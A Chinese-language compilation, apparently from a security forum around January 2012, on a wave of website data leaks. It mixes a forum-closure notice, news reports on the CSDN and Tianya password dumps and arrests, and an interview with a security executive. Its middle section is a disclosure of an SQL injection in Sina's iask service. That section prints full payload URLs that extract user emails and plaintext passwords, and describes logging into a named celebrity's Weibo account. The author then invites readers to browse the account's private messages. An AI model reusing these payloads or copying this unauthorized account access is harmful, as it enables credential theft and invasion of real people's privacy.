T00ls.Net长期被DDOS、CC，服务器不堪重负，现暂时关闭网站，希望未来或能解决此问题：



① 若有发展或指导性建议，请邮件或者微博联系管理员，但或不予以直接答复，请谅解。

② 重新开放时间请关注微博或者本站点，感谢大家长期以来对T00ls支持。

③ 感谢DDOSer们对T00ls的热爱，T00ls会因你们而进步。

记者1月10日从国家互联网信息办获悉，近期一些媒体报道或在网上流传的数家网站用户信息被泄露的事件，引起互联网管理部门的高度重视。目前，相关事实已由公安机关查明，违法人员已经或将要被依法严肃查处。

　　据这位发言人介绍，近期查处的信息泄露事件主要有五个。

　　一是CSDN、天涯网站被入侵事件。经查，这两家网站曾在2009年以前被入侵，数据遭泄露也发生在两年前，近期这两家网站并未遭受攻击。网名“臭小
子”的许某某（男，19岁，无业人员）出于个人炫耀的目的，于去年12月4日在乌云网上发帖称CSDN等网站数据密码被泄露，并公布泄露的数据包截图。现
许某某已被公安机关予以训诫。公安机关对这两家网站遭入侵事正在溯源追查。

　　二是网上流传的京东商城网站被入侵事。经查，这个网站确遭入侵但数据未被泄露。网名“我心飞翔”的犯罪嫌疑人要某（男，35岁，陕西省咸阳市某制药厂
员工）于2011年4月发现京东商城网站存在安全漏洞，当年12月29日在乌云网上发帖称掌握京东商城漏洞，以公布该安全漏洞要挟京东商城向其支付270
万元。京东商城网站未予支付，要某也并未窃取、泄露该网站相关数据。要某因涉嫌敲诈勒索，现已被依法刑事拘留。

　　三是“YY”语音聊天网站泄露数据事。经查，广东“YY”语音聊天网站泄露的数据，系该公司员工利用职务之便从公司内部备份数据库窃取的。该网站并未被入侵。此事正在处理之中。

　　四是网上流传的工商银行等金融机构数据泄露事。经有关部门对工商银行、民生银行、交通银行调查，证实其系统并未被入侵，网上公布的所谓“数据”与银行
相关数据不符。网名“挨踢客”的王某某（男，24岁）从事网络推广工作，为了提高自己所在网站的知名度和自我炒作，于2011年12月28日在其个人的挨
踢客网站和微博上凭空捏造，发布所谓工商银行等网站用户数据泄露的信息，王某某已被公安机关予以训诫。五是网上流传的新浪微博、当当网等网站被攻击事。经
查，新浪微博、开心网、7K7K网站、当当网、凡客诚品等网站均未被入侵。网上公布的上述网站部分账号密码系有人利用网络远程大规模猜测密码所破解，实施
密码破解的人员身份目前已被锁定，公安机关正在实施抓捕。

　　截至目前，公安机关此次已查处入侵、窃取、倒卖数据案件9起，编造并炒作信息泄露案件3起，刑事拘留4人，予以治安处罚8人。

　　国家互联网信息办发言人表示，从上述案例可以看到一些人编造或炒作网站用户信息被大规模泄露的消息，既有出于个人进行炫耀或骗取钱财的目的，也有一些
网络安全公司销售人员想以此提高知名度、推销自己的产品，还有个别人借机企图干扰和贬损北京等城市正在开展的微博客用户用真实身份信息注册工作。

　　他指出，国家互联网信息办公室、工信部和公安部等有关部门对非法入侵网站泄露数据信息的犯罪行为予以强烈谴责，并将依法严惩；对编造散布谣言的行为予
以谴责和查处。有关部门将继续采取有效措施，保护公民个人身份信息安全。公安机关将严厉打击非法入侵网站泄露数据信息的行为以及捏造事实、编造和传播谣言
的行为，并依法查处相关人员。各网站必须进一步建立健全用户信息安全管理制度，强化工作人员信息安全意识，严禁泄露用户信息，提高反病毒、反黑客能力，确
保用户信息安全。

CSDN“泄密门”两名黑客已经落网

昨天，几乎让互联网裸奔的“CSDN泄密门”事件传出最新消息，两名涉案黑客已经被抓，还有部分人员尚未落网。

日前，CSDN网站数据库遭黑客入侵，600万用户注册邮箱和密码被泄露。此后人人网、天涯社区、百合网等众多知名网站数千万网友个人信息相继被泄露，更有人将其做成压缩包，上传至网络供人下载。国内网站纷纷“沦陷”，大有“裸奔”之势。

记者昨日联系到北京市公安局外宣处，工作人员表示，目前已有两名涉案黑客被抓，由于部分涉案人员没有归案，具体案情尚不便向外界透露。北京市公安局外宣处相关负责人员告诉记者，此次泄密与实名制无关。

摘自：雅虎新闻   

    正义网浙江1月4日电(通讯员 王红)只因“个人兴趣”，19岁的李胖胖利用木马程序非法侵入公安局网站服务器，获取他人计算机控制权。2011年12月28日，浙江省台州市椒江区检察院以非法控制计算机信息系统罪对李胖胖提起公诉。据悉，这是浙江省检察机关首次起诉这一罪名的案件。

    据了解，1992年4月出生的李胖胖是贵州省遵义人，初中文化。2009年，李胖胖开始接触互联网，通过在QQ群和网上论坛的学习，掌握了网络攻击、网络漏洞扫描等黑客软件的使用方法。2011年2月开始，李胖胖在互联网上用软件随机扫描服务器漏洞，并通过软件自动建立新的用户名和密码，从而获取服务器的控制权。

    李胖胖交代，自己控制别人的计算机，完全是出于个人兴趣，并不是为了赚钱。得到服务器控制权后，他就到QQ群里叫卖，每个只卖5元到25元不等。

    2011年2月5日，李胖胖侵入并控制了“台州市网上公安局”网站服务器。3月15日，台州市公安局公共信息网络安全监察队工作人员在维护服务器时，发现有黑客侵入的痕迹和非法木马文件，可能对业务造成重大影响。工作人员通过技术侦查，锁定了犯罪嫌疑人李胖胖，随即报案。9月22日，李胖胖在遵义家中被警方抓获。经查，他共非法控制了包括台州市公安局网站服务器在内的34台服务器。

    据办案检察官介绍，非法控制计算机信息系统罪是根据刑法修正案(七)修改的新罪名。根据全国人大法工委刑法室对于该罪的释义，所谓的侵入是指未经授权或者他人同意，通过技术手段进入计算机信息系统。非法控制是指通过各种技术手段，使得他人的计算机信息系统处于掌控之中，能够接受其发出的命令。李胖胖利用木马程序非法侵入他人计算机服务器，符合这一罪名的构成要件。另外，“两高”出台的关于办理危害计算机信息系统安全刑事案件的相关司法解释规定，非法获取计算机信息系统数据或者非法控制计算机信息系统，非法控制计算机信息系统20台以上的，属于情节严重。李胖胖非法控制他人计算机服务器34台，已属于情节严重。



各位  兴趣归兴趣    玩玩就够了  我们都懂的~~

看到 公安的服务器还是乖点---------

相关厂商：www.sina.com

作者：http://weibo.com/evilniang

发现时间：2012-1-1

漏洞类型：sql注射

危害等级：高

漏洞状态：已修复



首先申明：该漏洞发现后本人已联系新浪官方修复漏洞，目前漏洞以修补。文章内容公布，仅供参考学习。



新浪网iask存在sql注射漏洞，利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。



漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9



漏洞利用方式:



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。



直接举个例子比如我们通过新浪微波查找到刘谦，点击他的个人资料。我们可以再浏览器地址栏处看到刘谦的uid(新浪用户数字id)，此处uid为12715428867







直接构造地址



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



直接获得刘谦的账号和密码







这里账号是luchenmagic密码为2lo*****（保密）



尝试登陆







成功登陆。刘谦微薄。这里你可以看看你的偶像的各种私信，聊天记录之类的。



接下来的事情你可以自由发挥了。但是对于一个黑客而言，这只不过是一个开始而已（这里我并无恶意，拿刘谦的账号来测试只是为了致敬，希望有机会能够见证奇迹！）。



后话：



1.2011年年底的csdn、天涯等用户库的泄露只不过是冰山一脚。



2.新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露，而且密码是密文保存。这里要提出质疑了，数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码（部分用户查不到密码）。至于用户信息是否泄露，这个不用说了把？



3.网络泄密涉及到太多。不管是普通网民，还是明星名人，都被牵涉进来。这里测试不少明星，基本上都能通过微薄获取他们的私人信息，甚至登陆他们的msn。（香港爆料杂志来找我把。开个玩笑。。。）



4.这个漏洞发现后我便通知了新浪官方,新浪在漏洞反馈和应急处理这方面做的不够快。收到漏洞后连给我回个邮件或者表示感谢都没有。（我是无私奉献白帽子，被活雷锋了。）



5.祝新年快乐。

----------------------------------------------------

游侠补充：

　　刚从流量统计系统看到阅读者暴增，原来是文中例子的主角刘谦先生在微博发了一条……好吧：这个事情，仅仅是刘谦先生的粉丝在做个安全测试，并无恶意。我们都喜欢刘先生的魔术。

　　谢谢刘谦先生给我博客打广告……来西安我请你吃肉夹馍、羊肉泡馍——管饱！ :)

　　另：文章是新浪打了补丁之后作者才发出来的，看到本文的时候还想测试的话……晚了。嘿嘿

“我自己做信息安全的，没有开网银，从没在网上进行出入境申请，从来不在网上支付东西，网络购物也从不自己下单，都是通过朋友的支付系统操作，让自己逃离那个环境。”市政协委员、广东南方信息安全产业基地有限公司董事长宋国琴的保守行为让记者大吃一惊。“在这个业界，了解得多，忧虑就会多些，于是行为就趋于保守，”宋国琴笑言，“这不是好事情，不值得推荐”。

　　连日来，国内多个知名商业网站、政务网站相继陷入“泄密门”，数千万的用户信息被泄露，在数以亿计的网民们中引发震动和不安。网络信息安全到底问题出在哪？网民们该如何保护自己的信息安全？昨日，市政协会议开幕之际，宋国琴接受本报记者专访，向广大网民支招。

　　宋国琴表示，网络技术是近几十年的爆炸性革命，发展到今天，引发的网络信息安全问题是必然的。前段时间，国外的银行也曾发生过数千万客户信息泄露的问题。所以，这是一个国际的共性问题。

　　互联网在中国起步较晚，国内在管理、规范等方面跟其他国家有差距，有一个日渐完善的过程。中国的互联网用户基数特别大，信息安全管理的难度就更大。“这是一个客观存在的巨大的问题。”

　　“信息技术发展到比较高端的一定是密码技术的运用。”宋国琴解释说，这个密码技术不是大家在网站注册时设置的密码，“那个6~8位数的英文或数字的设置只是个初级编码，无论怎么不规律，对于专业技术人员来说，几十秒钟就可以破译。”

　　宋国琴介绍，通过密码技术对个人的商务资料、个人信息、隐私文件等进行加密处理。她打了个比方：“这个密码技术就如银行的保险箱，对客户放在其中的东西进行加密，如果被盗，别人只能得到这个保险箱，却无法取得里面的东西。”目前，密码技术的运用不够广泛，如果以密码技术为核心的信息安全技术能够大量运用的话，陈冠希、张柏芝的“艳照门”事件也就不会发生了。

　　建议警方指引网民

　　“网络上暴民和良民混淆在一起，让我害怕。”虚拟社会的管理机制缺失，宋国琴坦陈自己“对网络有戒心，不太习惯过于依赖网络”。宋国琴指出，“下一步，国家有可能对互联网进行身份认证。不一定是实名制，但是是身份认证，这是一个趋势。”

　　宋国琴认为，要解决互联网安全问题，最核心的是要攻克海量身份识别技术。而从管理层面来说，要承认目前的管理环境和管理技术还不够完善。公安系统应给网民提供一些技术支持、引导，局部解决一些问题。比如：推荐市民采用一些带有密码技术的软件，对自己电脑里的重要资料和文件进行保护；如何识别钓鱼网站，有木马程序的网站等。她打算进行一个详细的调研，并形成提案交给公安部门和执法部门。

　　专家提醒网民：

　　开网页先看审核认证码

　　普通市民的信息安全技术和知识十分有限，他们在日常上网操作时该如何保护自己的信息安全？宋国琴建议，市民可以购买具有PC文件柜、文件锁功能的软件产品，对个人的商务资料、个人信息、隐私文件等进行加密，即使被盗了，别人看到的也只是一堆乱码。宋国琴指出，作为网络运营商、技术服务提供商，更应该通过密码技术的运用，提高所提供平台的安全性，给客户构筑一个安全的网络使用、交易环境。

　　不断有网友反映，收到QQ抽奖的页面链接。宋国琴表示，这都是假的，轻易进行下一步操作，会导致钱财损失。她建议网友打开网站首页时，首先页面最下方，如果有一连串审核认证号码、备案号码，表明这个网站的域名是在公安等相关部门注册了的，是正规网站。

　　链接：近期网络安全事件

　　去年12月22日，CSDN网站承认安全系统遭到黑客攻击，数据库中超过600万用户的登录名和密码泄露。当月26日，天涯网证实用户密码遭到泄露。当月29日上午，有网友称广东省公安厅出入境政务服务网网站后台存在漏洞。广东省公安厅随后承认，该网站确实存在技术漏洞，现已修补完毕。